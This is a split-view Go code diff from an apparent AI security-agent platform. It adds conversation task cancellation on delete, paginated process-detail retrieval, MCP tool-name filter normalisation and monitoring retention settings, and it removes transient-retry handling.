useFull := strings.TrimSpace(strings.ToLower(h.config.Security.ToolDescriptionMode)) == "full" return pickToolDescriptionWithMode(h.config.Security.ToolDescriptionMode, shortDesc, fullDesc)
}
func pickToolDescriptionWithMode(mode, shortDesc, fullDesc string) string {
useFull := strings.TrimSpace(strings.ToLower(mode)) == "full"
description := shortDesc description := shortDesc
if useFull { if useFull {
description = fullDesc description = fullDesc
@@ -2018,23 +2126,22 @@ func (h *ConfigHandler) pickToolDescription(shortDesc, fullDesc string) string {
// GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据) // GetToolSchema 获取单个工具的 inputSchema(按需加载,避免列表接口返回大量 schema 数据)
func (h *ConfigHandler) GetToolSchema(c *gin.Context) { func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
h.mu.RLock()
defer h.mu.RUnlock()
toolName := c.Param("name") toolName := c.Param("name")
if toolName == "" { if toolName == "" {
c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"}) c.JSON(http.StatusBadRequest, gin.H{"error": "工具名称不能为空"})
return return
} }
// 检查是否为外部工具(格式:mcpName::toolName
externalMCP := c.Query("external_mcp") externalMCP := c.Query("external_mcp")
if externalMCP != "" { if externalMCP != "" {
// 外部 MCP 工具 h.mu.RLock()
if h.externalMCPMgr != nil { externalMCPMgr := h.externalMCPMgr
h.mu.RUnlock()
if externalMCPMgr != nil {
ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second) ctx, cancel := context.WithTimeout(context.Background(), 5*time.Second)
defer cancel() defer cancel()
externalTools, _ := h.externalMCPMgr.GetAllTools(ctx) externalTools, _ := externalMCPMgr.GetAllTools(ctx)
fullName := externalMCP + "::" + toolName fullName := externalMCP + "::" + toolName
for _, t := range externalTools { for _, t := range externalTools {
if t.Name == fullName { if t.Name == fullName {
@@ -2047,8 +2154,12 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
return return
} }
// 内部工具:从 YAML 配置的 Parameters 构建 h.mu.RLock()
for _, tool := range h.config.Security.Tools { securityTools := append([]config.ToolConfig(nil), h.config.Security.Tools...)
mcpServer := h.mcpServer
h.mu.RUnlock()
for _, tool := range securityTools {
if tool.Name == toolName { if tool.Name == toolName {
c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)}) c.JSON(http.StatusOK, gin.H{"input_schema": buildInputSchemaFromParams(tool.Parameters)})
return return
@@ -2056,8 +2167,8 @@ func (h *ConfigHandler) GetToolSchema(c *gin.Context) {
} }
// MCP 注册工具(如知识检索) // MCP 注册工具(如知识检索)
if h.mcpServer != nil { if mcpServer != nil {
for _, mt := range h.mcpServer.GetAllTools() { for _, mt := range mcpServer.GetAllTools() {
if mt.Name == toolName { if mt.Name == toolName {
c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema}) c.JSON(http.StatusOK, gin.H{"input_schema": mt.InputSchema})
return return
+75 -9
View File
@@ -12,11 +12,17 @@ import (
"go.uber.org/zap" "go.uber.org/zap"
) )
// ConversationTaskStopper cancels in-flight agent work when a conversation is removed.
type ConversationTaskStopper interface {
CancelRunningTaskForConversation(conversationID string)
}
// ConversationHandler 对话处理器 // ConversationHandler 对话处理器
type ConversationHandler struct { type ConversationHandler struct {
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
audit *audit.Service audit *audit.Service
taskStopper ConversationTaskStopper
} }
// SetAudit wires platform audit logging. // SetAudit wires platform audit logging.
@@ -24,6 +30,11 @@ func (h *ConversationHandler) SetAudit(s *audit.Service) {
h.audit = s h.audit = s
} }
// SetTaskStopper wires cancellation of in-flight agent tasks on conversation delete.
func (h *ConversationHandler) SetTaskStopper(stopper ConversationTaskStopper) {
h.taskStopper = stopper
}
// NewConversationHandler 创建新的对话处理器 // NewConversationHandler 创建新的对话处理器
func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler { func NewConversationHandler(db *database.DB, logger *zap.Logger) *ConversationHandler {
return &ConversationHandler{ return &ConversationHandler{
@@ -105,17 +116,18 @@ func (h *ConversationHandler) ListConversations(c *gin.Context) {
excludeGrouped := strings.TrimSpace(search) == "" && excludeGrouped := strings.TrimSpace(search) == "" &&
(c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1") (c.Query("exclude_grouped") == "true" || c.Query("exclude_grouped") == "1")
sortBy := strings.TrimSpace(c.Query("sort_by"))
var conversations []*database.Conversation var conversations []*database.Conversation
var total int var total int
var err error var err error
if excludeGrouped { if excludeGrouped {
conversations, err = h.db.ListUngroupedConversations(limit, offset) conversations, err = h.db.ListUngroupedConversations(limit, offset, sortBy)
if err == nil { if err == nil {
total, err = h.db.CountUngroupedConversations() total, err = h.db.CountUngroupedConversations()
} }
} else { } else {
conversations, err = h.db.ListConversations(limit, offset, search) conversations, err = h.db.ListConversations(limit, offset, search, sortBy)
if err == nil { if err == nil {
total, err = h.db.CountConversations(search) total, err = h.db.CountConversations(search)
} }
@@ -164,6 +176,9 @@ func (h *ConversationHandler) GetConversation(c *gin.Context) {
} }
// GetMessageProcessDetails 获取指定消息的过程详情(按需加载) // GetMessageProcessDetails 获取指定消息的过程详情(按需加载)
// 查询参数:
// - summary=1:仅返回摘要(total / iterationCount / maxIteration
// - limit + offset:分页返回 processDetails(未指定 limit 时保持全量兼容)
func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) { func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
messageID := c.Param("id") messageID := c.Param("id")
if messageID == "" { if messageID == "" {
@@ -171,6 +186,51 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
return return
} }
summaryStr := strings.TrimSpace(c.Query("summary"))
if summaryStr == "1" || strings.EqualFold(summaryStr, "true") || strings.EqualFold(summaryStr, "yes") {
summary, err := h.db.GetProcessDetailsSummary(messageID)
if err != nil {
h.logger.Error("获取过程详情摘要失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
c.JSON(http.StatusOK, gin.H{"summary": summary})
return
}
limitStr := strings.TrimSpace(c.Query("limit"))
if limitStr != "" {
limit, err := strconv.Atoi(limitStr)
if err != nil || limit <= 0 {
c.JSON(http.StatusBadRequest, gin.H{"error": "invalid limit"})
return
}
if limit > 500 {
limit = 500
}
offset, _ := strconv.Atoi(strings.TrimSpace(c.Query("offset")))
if offset < 0 {
offset = 0
}
details, total, err := h.db.GetProcessDetailsPage(messageID, limit, offset)
if err != nil {
h.logger.Error("分页获取过程详情失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
return
}
details = database.DedupeConsecutiveProcessDetails(details)
out := processDetailsToJSON(h.logger, details)
c.JSON(http.StatusOK, gin.H{
"processDetails": out,
"total": total,
"offset": offset,
"limit": limit,
"hasMore": offset+len(out) < total,
})
return
}
details, err := h.db.GetProcessDetails(messageID) details, err := h.db.GetProcessDetails(messageID)
if err != nil { if err != nil {
h.logger.Error("获取过程详情失败", zap.Error(err)) h.logger.Error("获取过程详情失败", zap.Error(err))
@@ -179,14 +239,17 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
} }
details = database.DedupeConsecutiveProcessDetails(details) details = database.DedupeConsecutiveProcessDetails(details)
out := processDetailsToJSON(h.logger, details)
c.JSON(http.StatusOK, gin.H{"processDetails": out, "total": len(out)})
}
// 转换为前端期望的 JSON 结构(与 GetConversation 中 processDetails 结构一致) func processDetailsToJSON(logger *zap.Logger, details []database.ProcessDetail) []map[string]interface{} {
out := make([]map[string]interface{}, 0, len(details)) out := make([]map[string]interface{}, 0, len(details))
for _, d := range details { for _, d := range details {
var data interface{} var data interface{}
if d.Data != "" { if d.Data != "" {
if err := json.Unmarshal([]byte(d.Data), &data); err != nil { if err := json.Unmarshal([]byte(d.Data), &data); err != nil {
h.logger.Warn("解析过程详情数据失败", zap.Error(err)) logger.Warn("解析过程详情数据失败", zap.Error(err))
} }
} }
out = append(out, map[string]interface{}{ out = append(out, map[string]interface{}{
@@ -199,8 +262,7 @@ func (h *ConversationHandler) GetMessageProcessDetails(c *gin.Context) {
"createdAt": d.CreatedAt, "createdAt": d.CreatedAt,
}) })
} }
return out
c.JSON(http.StatusOK, gin.H{"processDetails": out})
} }
// UpdateConversationRequest 更新对话请求 // UpdateConversationRequest 更新对话请求
@@ -244,6 +306,10 @@ func (h *ConversationHandler) UpdateConversation(c *gin.Context) {
func (h *ConversationHandler) DeleteConversation(c *gin.Context) { func (h *ConversationHandler) DeleteConversation(c *gin.Context) {
id := c.Param("id") id := c.Param("id")
if h.taskStopper != nil {
h.taskStopper.CancelRunningTaskForConversation(id)
}
if err := h.db.DeleteConversation(id); err != nil { if err := h.db.DeleteConversation(id); err != nil {
h.logger.Error("删除对话失败", zap.Error(err)) h.logger.Error("删除对话失败", zap.Error(err))
c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()}) c.JSON(http.StatusInternalServerError, gin.H{"error": err.Error()})
@@ -0,0 +1,30 @@
package handler
import (
"context"
"testing"
"time"
"go.uber.org/zap"
)
func TestConversationHandlerDeleteConversationCancelsRunningTask(t *testing.T) {
tm := NewAgentTaskManager()
ctx, cancel := context.WithCancelCause(context.Background())
_, err := tm.StartTask("conv-1", "hello", cancel)
if err != nil {
t.Fatalf("StartTask: %v", err)
}
h := &AgentHandler{tasks: tm, logger: zap.NewNop()}
h.CancelRunningTaskForConversation("conv-1")
select {
case <-ctx.Done():
case <-time.After(2 * time.Second):
t.Fatal("task context was not cancelled")
}
if cause := context.Cause(ctx); cause != ErrTaskCancelled {
t.Fatalf("expected ErrTaskCancelled, got %v", cause)
}
}
-95
View File
@@ -2,29 +2,11 @@ package handler
import ( import (
"context" "context"
"errors"
"fmt"
"strings"
"time"
"cyberstrike-ai/internal/agent" "cyberstrike-ai/internal/agent"
"cyberstrike-ai/internal/multiagent" "cyberstrike-ai/internal/multiagent"
) )
func (h *AgentHandler) einoRunRetryMaxAttempts() int {
if h.config != nil {
return multiagent.RunRetryMaxAttemptsFromConfig(&h.config.MultiAgent.EinoMiddleware)
}
return multiagent.RunRetryMaxAttemptsFromConfig(nil)
}
func (h *AgentHandler) einoRunRetryMaxBackoffSec() int {
if h.config != nil && h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec > 0 {
return h.config.MultiAgent.EinoMiddleware.RunRetryMaxBackoffSec
}
return 0
}
// applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。 // applyEinoTraceResumeSegment 中断并继续:persist last_react_* → loadHistory,可选替换下一段 user 文案。
func (h *AgentHandler) applyEinoTraceResumeSegment( func (h *AgentHandler) applyEinoTraceResumeSegment(
conversationID string, conversationID string,
@@ -43,80 +25,3 @@ func (h *AgentHandler) applyEinoTraceResumeSegment(
*curFinalMessage = segmentUserMessage *curFinalMessage = segmentUserMessage
} }
} }
// applyEinoTransientRetrySegment 临时错误重试:恢复轨迹并保留本请求原始 user 文案(不注入续跑说明)。
// segmentUserMessage 为本轮 HTTP 请求开始时用户发送的内容,避免因清空 finalMessage 而丢失「你好」等短句。
func (h *AgentHandler) applyEinoTransientRetrySegment(
conversationID string,
result *multiagent.RunResult,
curHistory *[]agent.ChatMessage,
curFinalMessage *string,
segmentUserMessage string,
) {
if shouldPersistEinoAgentTraceAfterRunError(context.Background()) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
if hist, err := h.loadHistoryFromAgentTrace(conversationID); err == nil && len(hist) > 0 {
*curHistory = hist
}
if s := strings.TrimSpace(segmentUserMessage); s != "" {
*curFinalMessage = segmentUserMessage
}
}
// handleEinoTransientRetryContinue 在 SSE 任务循环内处理临时错误重试;返回 true 表示外层 for 应 continue。
func (h *AgentHandler) handleEinoTransientRetryContinue(
baseCtx context.Context,
conversationID string,
result *multiagent.RunResult,
runErr error,
transientAttempts *int,
curHistory *[]agent.ChatMessage,
curFinalMessage *string,
segmentUserMessage string,
progressCallback func(eventType, message string, data interface{}),
sendProgress func(msg string, extra map[string]interface{}),
) (handled bool, fatal error) {
if !errors.Is(runErr, multiagent.ErrTransientRetryContinue) {
return false, nil
}
maxAttempts := h.einoRunRetryMaxAttempts()
*transientAttempts++
if *transientAttempts > maxAttempts {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(conversationID, result)
}
return false, errors.New("transient retry exhausted: " + runErr.Error())
}
attemptNo := *transientAttempts
backoff := multiagent.TransientRetryBackoff(attemptNo-1, h.einoRunRetryMaxBackoffSec())
if progressCallback != nil {
progressCallback("eino_run_retry", fmt.Sprintf("遇到临时错误,%d 秒后第 %d/%d 次重试…", int(backoff.Seconds()), attemptNo, maxAttempts), map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"attempt": attemptNo,
"maxAttempts": maxAttempts,
"backoffSec": int(backoff.Seconds()),
})
}
select {
case <-baseCtx.Done():
return false, context.Cause(baseCtx)
case <-time.After(backoff):
}
h.applyEinoTransientRetrySegment(conversationID, result, curHistory, curFinalMessage, segmentUserMessage)
if progressCallback != nil {
progressCallback("eino_run_retry", "已恢复上下文,正在重试…", map[string]interface{}{
"conversationId": conversationID,
"source": "eino",
"attempt": attemptNo,
})
}
if sendProgress != nil {
sendProgress("正在重试…", map[string]interface{}{
"conversationId": conversationID,
"source": "transient_retry",
})
}
return true, nil
}
+27 -39
View File
@@ -119,7 +119,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
var cancelWithCause context.CancelCauseFunc var cancelWithCause context.CancelCauseFunc
curFinalMessage := prep.FinalMessage curFinalMessage := prep.FinalMessage
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
curHistory := prep.History curHistory := prep.History
roleTools := prep.RoleTools roleTools := prep.RoleTools
@@ -177,7 +176,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
taskOwned = true taskOwned = true
var cumulativeMCPExecutionIDs []string var cumulativeMCPExecutionIDs []string
var transientRunAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int var mainIterationOffset int
@@ -214,6 +212,7 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
} }
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID) taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks) taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = mcp.WithEinoExecuteRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) { taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments) return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
}) })
@@ -223,8 +222,10 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
h.config, h.config,
&h.config.MultiAgent, &h.config.MultiAgent,
h.agent, h.agent,
h.db,
h.logger, h.logger,
conversationID, conversationID,
h.conversationProjectID(conversationID),
curFinalMessage, curFinalMessage,
curHistory, curHistory,
roleTools, roleTools,
@@ -238,30 +239,10 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
} }
if runErr == nil { if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0
timeoutCancel() timeoutCancel()
break break
} }
handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, conversationID, result, runErr, &transientRunAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if handled {
mainIterationOffset += segmentMainIterationMax
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
if fatalErr != nil {
runErr = fatalErr
}
cause := context.Cause(baseCtx) cause := context.Cause(baseCtx)
if errors.Is(cause, multiagent.ErrInterruptContinue) { if errors.Is(cause, multiagent.ErrInterruptContinue) {
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
@@ -286,8 +267,6 @@ func (h *AgentHandler) EinoSingleAgentLoopStream(c *gin.Context) {
"source": "interrupt_continue", "source": "interrupt_continue",
}) })
mainIterationOffset += segmentMainIterationMax mainIterationOffset += segmentMainIterationMax
// 非临时错误分段续跑(用户中断并继续)时,清空 transient 计数,避免跨分段累加。
transientRunAttempts = 0
timeoutCancel() timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background()) baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause) h.tasks.BindTaskCancel(conversationID, cancelWithCause)
@@ -418,21 +397,30 @@ func (h *AgentHandler) EinoSingleAgentLoop(c *gin.Context) {
return return
} }
result, runErr := multiagent.RunEinoSingleChatModelAgent( curHist := prep.History
taskCtx, curMsg := prep.FinalMessage
h.config, var result *multiagent.RunResult
&h.config.MultiAgent, var runErr error
h.agent, for {
h.logger, result, runErr = multiagent.RunEinoSingleChatModelAgent(
prep.ConversationID, taskCtx,
prep.FinalMessage, h.config,
prep.History, &h.config.MultiAgent,
prep.RoleTools, h.agent,
progressCallback, h.db,
chatReasoningToClientIntent(req.Reasoning), h.logger,
h.projectBlackboardBlock(prep.ConversationID), prep.ConversationID,
) h.conversationProjectID(prep.ConversationID),
if runErr != nil { curMsg,
curHist,
prep.RoleTools,
progressCallback,
chatReasoningToClientIntent(req.Reasoning),
h.projectBlackboardBlock(prep.ConversationID),
)
if runErr == nil {
break
}
if shouldPersistEinoAgentTraceAfterRunError(baseCtx) { if shouldPersistEinoAgentTraceAfterRunError(baseCtx) {
h.persistEinoAgentTraceForResume(prep.ConversationID, result) h.persistEinoAgentTraceForResume(prep.ConversationID, result)
} }
+10 -11
View File
@@ -64,10 +64,7 @@ func (h *ExternalMCPHandler) GetExternalMCPs(c *gin.Context) {
} }
toolCount := toolCounts[name] toolCount := toolCounts[name]
errorMsg := "" errorMsg := externalMCPStatusError(h.manager, name, status)
if status == "error" {
errorMsg = h.manager.GetError(name)
}
result[name] = ExternalMCPResponse{ result[name] = ExternalMCPResponse{
Config: cfg, Config: cfg,
@@ -115,20 +112,22 @@ func (h *ExternalMCPHandler) GetExternalMCP(c *gin.Context) {
} }
} }
// 获取错误信息
errorMsg := ""
if status == "error" {
errorMsg = h.manager.GetError(name)
}
c.JSON(http.StatusOK, ExternalMCPResponse{ c.JSON(http.StatusOK, ExternalMCPResponse{
Config: cfg, Config: cfg,
Status: status, Status: status,
ToolCount: toolCount, ToolCount: toolCount,
Error: errorMsg, Error: externalMCPStatusError(h.manager, name, status),
}) })
} }
// externalMCPStatusError 在 error/disconnected 状态下返回最近错误(含断连原因)。
func externalMCPStatusError(manager *mcp.ExternalMCPManager, name, status string) string {
if status != "error" && status != "disconnected" {
return ""
}
return manager.GetError(name)
}
// AddOrUpdateExternalMCP 添加或更新外部MCP配置 // AddOrUpdateExternalMCP 添加或更新外部MCP配置
func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) { func (h *ExternalMCPHandler) AddOrUpdateExternalMCP(c *gin.Context) {
var req AddOrUpdateExternalMCPRequest var req AddOrUpdateExternalMCPRequest
+10
View File
@@ -271,6 +271,16 @@ func TestExternalMCPHandler_DeleteExternalMCP(t *testing.T) {
} }
} }
func TestExternalMCPStatusError(t *testing.T) {
manager := mcp.NewExternalMCPManager(zap.NewNop())
if got := externalMCPStatusError(manager, "x", "connected"); got != "" {
t.Fatalf("connected status should not return error, got %q", got)
}
if got := externalMCPStatusError(manager, "x", "connecting"); got != "" {
t.Fatalf("connecting status should not return error, got %q", got)
}
}
func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) { func TestExternalMCPHandler_GetExternalMCPs(t *testing.T) {
router, handler, _ := setupTestRouter() router, handler, _ := setupTestRouter()
+73 -24
View File
@@ -10,8 +10,10 @@ import (
"time" "time"
"cyberstrike-ai/internal/audit" "cyberstrike-ai/internal/audit"
"cyberstrike-ai/internal/config"
"cyberstrike-ai/internal/database" "cyberstrike-ai/internal/database"
"cyberstrike-ai/internal/mcp" "cyberstrike-ai/internal/mcp"
"cyberstrike-ai/internal/monitor"
"cyberstrike-ai/internal/security" "cyberstrike-ai/internal/security"
"github.com/gin-gonic/gin" "github.com/gin-gonic/gin"
"go.uber.org/zap" "go.uber.org/zap"
@@ -19,12 +21,18 @@ import (
// MonitorHandler 监控处理器 // MonitorHandler 监控处理器
type MonitorHandler struct { type MonitorHandler struct {
mcpServer *mcp.Server mcpServer *mcp.Server
externalMCPMgr *mcp.ExternalMCPManager externalMCPMgr *mcp.ExternalMCPManager
executor *security.Executor executor *security.Executor
db *database.DB db *database.DB
logger *zap.Logger logger *zap.Logger
audit *audit.Service audit *audit.Service
monitorRetention *monitor.Service
}
// SetMonitorRetention wires MCP execution retention settings.
func (h *MonitorHandler) SetMonitorRetention(s *monitor.Service) {
h.monitorRetention = s
} }
// SetAudit wires platform audit logging. // SetAudit wires platform audit logging.
@@ -50,13 +58,14 @@ func (h *MonitorHandler) SetExternalMCPManager(mgr *mcp.ExternalMCPManager) {
// MonitorResponse 监控响应 // MonitorResponse 监控响应
type MonitorResponse struct { type MonitorResponse struct {
Executions []*mcp.ToolExecution `json:"executions"` Executions []*mcp.ToolExecution `json:"executions"`
Stats map[string]*mcp.ToolStats `json:"stats"` Stats map[string]*mcp.ToolStats `json:"stats"`
Timestamp time.Time `json:"timestamp"` Timestamp time.Time `json:"timestamp"`
Total int `json:"total,omitempty"` Total int `json:"total,omitempty"`
Page int `json:"page,omitempty"` Page int `json:"page,omitempty"`
PageSize int `json:"page_size,omitempty"` PageSize int `json:"page_size,omitempty"`
TotalPages int `json:"total_pages,omitempty"` TotalPages int `json:"total_pages,omitempty"`
RetentionDays int `json:"retention_days,omitempty"`
} }
// Monitor 获取监控信息 // Monitor 获取监控信息
@@ -77,8 +86,8 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
// 解析状态筛选参数 // 解析状态筛选参数
status := c.Query("status") status := c.Query("status")
// 解析工具筛选参数 // 解析工具筛选参数(兼容 mcp__tool 与内部 mcp::tool
toolName := c.Query("tool") toolName := normalizeToolNameFilter(c.Query("tool"))
executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName) executions, total := h.loadExecutionsWithPagination(page, pageSize, status, toolName)
stats := h.loadStats() stats := h.loadStats()
@@ -89,16 +98,24 @@ func (h *MonitorHandler) Monitor(c *gin.Context) {
} }
c.JSON(http.StatusOK, MonitorResponse{ c.JSON(http.StatusOK, MonitorResponse{
Executions: executions, Executions: executions,
Stats: stats, Stats: stats,
Timestamp: time.Now(), Timestamp: time.Now(),
Total: total, Total: total,
Page: page, Page: page,
PageSize: pageSize, PageSize: pageSize,
TotalPages: totalPages, TotalPages: totalPages,
RetentionDays: h.monitorRetentionDays(),
}) })
} }
func (h *MonitorHandler) monitorRetentionDays() int {
if h.monitorRetention != nil {
return h.monitorRetention.RetentionDays()
}
return config.MonitorConfig{}.RetentionDaysEffective()
}
func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution { func (h *MonitorHandler) loadExecutions() []*mcp.ToolExecution {
executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "") executions, _ := h.loadExecutionsWithPagination(1, 1000, "", "")
return executions return executions
@@ -113,7 +130,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
for _, exec := range allExecutions { for _, exec := range allExecutions {
matchStatus := status == "" || exec.Status == status matchStatus := status == "" || exec.Status == status
// 支持部分匹配(模糊搜索) // 支持部分匹配(模糊搜索)
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName)) matchTool := toolNameFilterMatches(exec.ToolName, toolName)
if matchStatus && matchTool { if matchStatus && matchTool {
filtered = append(filtered, exec) filtered = append(filtered, exec)
} }
@@ -143,7 +160,7 @@ func (h *MonitorHandler) loadExecutionsWithPagination(page, pageSize int, status
for _, exec := range allExecutions { for _, exec := range allExecutions {
matchStatus := status == "" || exec.Status == status matchStatus := status == "" || exec.Status == status
// 支持部分匹配(模糊搜索) // 支持部分匹配(模糊搜索)
matchTool := toolName == "" || strings.Contains(strings.ToLower(exec.ToolName), strings.ToLower(toolName)) matchTool := toolNameFilterMatches(exec.ToolName, toolName)
if matchStatus && matchTool { if matchStatus && matchTool {
filtered = append(filtered, exec) filtered = append(filtered, exec)
} }
@@ -584,3 +601,35 @@ func (h *MonitorHandler) DeleteExecutions(c *gin.Context) {
h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs))) h.logger.Info("尝试批量删除内存中的执行记录", zap.Int("count", len(request.IDs)))
c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"}) c.JSON(http.StatusOK, gin.H{"message": "执行记录已删除(如果存在)"})
} }
// normalizeToolNameFilter 将模型侧 mcp__tool 转为内部存储用的 mcp::tool。
func normalizeToolNameFilter(name string) string {
name = strings.TrimSpace(name)
if name == "" {
return name
}
if strings.Contains(name, "::") {
return name
}
if idx := strings.Index(name, "__"); idx > 0 {
return name[:idx] + "::" + name[idx+2:]
}
return name
}
func toolNameFilterMatches(storedName, filter string) bool {
filter = strings.TrimSpace(filter)
if filter == "" {
return true
}
storedLower := strings.ToLower(storedName)
filterLower := strings.ToLower(filter)
if strings.Contains(storedLower, filterLower) {
return true
}
normFilter := strings.ToLower(normalizeToolNameFilter(filter))
if normFilter != filterLower && strings.Contains(storedLower, normFilter) {
return true
}
return strings.Contains(strings.ReplaceAll(storedLower, "::", "__"), filterLower)
}
+29 -41
View File
@@ -136,7 +136,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
var cancelWithCause context.CancelCauseFunc var cancelWithCause context.CancelCauseFunc
curFinalMessage := prep.FinalMessage curFinalMessage := prep.FinalMessage
segmentUserMessage := prep.FinalMessage // 本请求原始用户句,临时重试时不得丢失
curHistory := prep.History curHistory := prep.History
roleTools := prep.RoleTools roleTools := prep.RoleTools
orch := strings.TrimSpace(req.Orchestration) orch := strings.TrimSpace(req.Orchestration)
@@ -187,7 +186,6 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
// 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表 // 同一 HTTP 流内多段 Run(如中断并继续)合并 MCP execution id,供最终 response / 库表与工具芯片展示完整列表
var cumulativeMCPExecutionIDs []string var cumulativeMCPExecutionIDs []string
var transientRunAttempts int
// 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。 // 同一请求内分段续跑时,主代理 iteration 事件按偏移累计,避免 UI 出现「第3轮 → 第1轮」回跳。
var mainIterationOffset int var mainIterationOffset int
@@ -224,6 +222,7 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
} }
taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID) taskCtxLoop := mcp.WithMCPConversationID(taskCtx, conversationID)
taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks) taskCtxLoop = mcp.WithToolRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = mcp.WithEinoExecuteRunRegistry(taskCtxLoop, h.tasks)
taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) { taskCtxLoop = multiagent.WithHITLToolInterceptor(taskCtxLoop, func(ctx context.Context, toolName, arguments string) (string, error) {
return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments) return h.interceptHITLForEinoTool(ctx, cancelWithCause, conversationID, assistantMessageID, sendEvent, toolName, arguments)
}) })
@@ -233,8 +232,10 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
h.config, h.config,
&h.config.MultiAgent, &h.config.MultiAgent,
h.agent, h.agent,
h.db,
h.logger, h.logger,
conversationID, conversationID,
h.conversationProjectID(conversationID),
curFinalMessage, curFinalMessage,
curHistory, curHistory,
roleTools, roleTools,
@@ -250,30 +251,10 @@ func (h *AgentHandler) MultiAgentLoopStream(c *gin.Context) {
} }
if runErr == nil { if runErr == nil {
// 任一段成功完成后,重置临时错误重试窗口(次数/退避从头开始)。
transientRunAttempts = 0
timeoutCancel() timeoutCancel()
break break
} }
handled, fatalErr := h.handleEinoTransientRetryContinue(
baseCtx, conversationID, result, runErr, &transientRunAttempts,
&curHistory, &curFinalMessage, segmentUserMessage, progressCallback,
func(msg string, extra map[string]interface{}) { sendEvent("progress", msg, extra) },
)
if handled {
mainIterationOffset += segmentMainIterationMax
timeoutCancel()
baseCtx, cancelWithCause = context.WithCancelCause(context.Background())
h.tasks.BindTaskCancel(conversationID, cancelWithCause)
taskCtx, timeoutCancel = context.WithTimeout(baseCtx, 600*time.Minute)
h.tasks.UpdateTaskStatus(conversationID, "running")
continue
}
